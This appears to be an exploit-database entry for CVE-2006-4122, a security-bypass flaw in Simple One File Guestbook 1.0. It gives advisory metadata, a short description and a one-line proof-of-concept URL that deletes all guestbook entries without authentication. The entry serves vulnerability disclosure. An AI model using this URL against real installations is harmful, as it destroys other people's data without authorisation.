Simple One File Guestbook 1.0 - Security Bypass

Author: omnipresent
type: webapps
platform: php
port: 
date_added: 2006-08-09  
date_updated: 2013-09-18  
verified: 1  
codes: CVE-2006-4122;OSVDB-29159  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 28362.txt  
source: https://www.securityfocus.com/bid/19437/info

Simple one-file guestbook is prone to a security-bypass vulnerability. An attacker can bypass authentication measures by using a specific URL to delete all guestbook entries.

Version 1.0 of Simple one-file guestbook is vulnerable. Other versions may be affected as well.

#Simple One-File Guestbook Adminstrator Credential Bypass
#Proof of Concept URL

http://www.example.com/[path]/guestbook.php?id=4